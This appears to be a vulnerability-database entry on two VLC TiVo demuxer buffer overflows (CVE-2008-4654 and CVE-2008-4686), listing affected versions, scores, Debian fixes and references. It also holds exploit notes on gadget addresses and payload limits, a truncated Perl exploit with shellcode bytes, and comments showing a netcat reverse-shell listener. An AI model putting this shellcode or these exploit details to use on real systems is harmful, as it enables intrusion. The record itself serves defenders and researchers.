CVE-2008-4654
Published 2008-10-22
Priority: P2 · 62 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit available
EPSS: 57.55% (99.0th percentile)
Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote attackers to execute arbitrary code via a TiVo TY media file with a header containing a crafted size value.
Affected (16 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 0.8.6.h-4.1 (bookworm) | vlc 0.8.6.h-4.1 (bookworm) |
| debian | vlc | < vlc 1.0.3-1 (bookworm) | vlc 1.0.3-1 (bookworm) |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 1.0.3-1 | 1.0.3-1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 1.0.3-1 | 1.0.3-1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 1.0.3-1 | 1.0.3-1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 1.0.3-1 | 1.0.3-1 |
Detection & IOCs (extracted from sources)
- bytes: `\xF5\x46\x7A\xBD`
- bytes: `\xF5\x46\x7A\xBD\x00\x00\x00\x02\x00\x02\x00\x00`
- bytes: `\x24\x11\x62\x77`
- bytes: `\xb3\x57\x04\x7d`
- bytes: `\x13\x12\x54\x6a`
- The jmp-esp ROP gadget addresses (0x6a575cad for VLC 0.9.4, 0x65473351 for VLC 0.9.2) are specific to XP SP3 English builds of libvlc; these addresses will differ on other OS/SP/language combinations and the exploit will fail or crash VLC instead.
- The Metasploit payload space is constrained to 550 bytes with null bytes as bad characters; payloads exceeding this space or containing \x00 will not function correctly.
- The exploit works both with a local file and with a remote URL delivered to VLC, broadening the attack surface beyond just local file open scenarios.
- CVE-2008-4686 (integer overflows in the same ty.c file) is a distinct but related vulnerability; patching CVE-2008-4654 alone (fixed in VLC 1.0.3-1 on Debian) does not address CVE-2008-4686.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| osv | — | 9.3 | CRITICAL | — |
| vendor_debian | — | 9.3 | LOW | — |
GHSA: GHSA-2p9m-qq44-x2r6 (CVE-2008-4686, CRITICAL)
ghsa_unreviewed · 2022-05-17 · CVSS 9.3
Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to execute arbitrary code via a crafted .ty file, a different vulnerability than CVE-2008-4654.
GHSA: GHSA-wrh9-pxv5-hf6w (CVE-2008-4654, HIGH, CWE-119)
ghsa_unreviewed · 2022-05-14
Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote attackers to execute arbitrary code via a TiVo TY media file with a header containing a crafted size value.
OSV: CVE-2008-4686 (CRITICAL)
osv · 2008-10-22 · CVSS 9.3
Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to execute arbitrary code via a crafted .ty file, a different vulnerability than CVE-2008-4654.
OSV: CVE-2008-4654 (CRITICAL)
osv · 2008-10-22 · CVSS 9.3
Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote attackers to execute arbitrary code via a TiVo TY media file with a header containing a crafted size value.
Debian: CVE-2008-4686, package vlc (CRITICAL)
vendor_debian · 2008 · CVSS 9.3
Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to execute arbitrary code via a crafted .ty file, a different vulnerability than CVE-2008-4654.
Scope: local
- bookworm: resolved (fixed in 0.8.6.h-4.1)
- bullseye: resolved (fixed in 0.8.6.h-4.1)
- forky: resolved (fixed in 0.8.6.h-4.1)
- sid: resolved (fixed in 0.8.6.h-4.1)
- trixie: resolved (fixed in 0.8.6.h-4.1)
Debian: CVE-2008-4654, package vlc (CRITICAL)
vendor_debian · 2008 · CVSS 9.3
Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote attackers to execute arbitrary code via a TiVo TY media file with a header containing a crafted size value.
Scope: local
- bookworm: resolved (fixed in 1.0.3-1)
- bullseye: resolved (fixed in 1.0.3-1)
- forky: resolved (fixed in 1.0.3-1)
- sid: resolved (fixed in 1.0.3-1)
- trixie: resolved (fixed in 1.0.3-1)
No detection rules found.
Exploit-DB: VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)
exploitdb · 2011-02-02 · CVE-2008-4654

```ruby
##
# $Id: videolan_tivo.rb 11701 2011-02-02 21:47:02Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'VideoLAN VLC TiVo Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in VideoLAN VLC 0.9.4.
By creating a malicious TY file, a remote attacker could overflow a
buffer and execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => 'MC',
'Version' => '$Revision: 11701 $',
'References' =>
[
[ 'CVE', '2008-4654' ],
[ 'OSVDB', '49181'
```
Exploit-DB: VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
exploitdb · 2008-10-23 · CVE-2008-4686

```perl
#!/usr/bin/perl
# 10/23/2008 k`sOSe
# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit
# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k)
# 2 - Works both with a local file and with a remote url
# 3 - VLC does not crash!
# 4 - Enjoy a respawning shell, even if VLC will be closed!
#
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft C
```
Exploit-DB: VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow
exploitdb · 2008-10-21 · CVE-2008-4686

```perl
#!/usr/bin/perl
# 10/21/2008 k`sOSe
use warnings;
use strict;
# windows/exec - 141 bytes
# http://www.metasploit.com
my $shellcode =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
"\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73" .
"\x74\x65\x6d\x33\x32\x5c\x63\x61\x6c\x63\
```
Metasploit: VideoLAN VLC TiVo Buffer Overflow
metasploit
This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By creating a malicious TY file, a remote attacker could overflow a buffer and execute arbitrary code.
No writeups or analysis indexed.
References
- http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=502726
- http://git.videolan.org/?p=vlc.git%3Ba=commit%3Bh=fde9e1cc1fe1ec9635169fa071e42b3aa6436033
- http://git.videolan.org/?p=vlc.git%3Ba=commitdiff%3Bh=26d92b87bba99b5ea2e17b7eaa39c462d65e9133
- http://secunia.com/advisories/32339
- http://securityreason.com/securityalert/4460
- http://www.openwall.com/lists/oss-security/2008/10/19/2
- http://www.securityfocus.com/archive/1/497587/100/0/threaded
- http://www.securityfocus.com/bid/31813
- http://www.trapkit.de/advisories/TKADV2008-010.txt
- http://www.videolan.org/security/sa0809.html
- http://www.vupen.com/english/advisories/2008/2856
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45960
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14803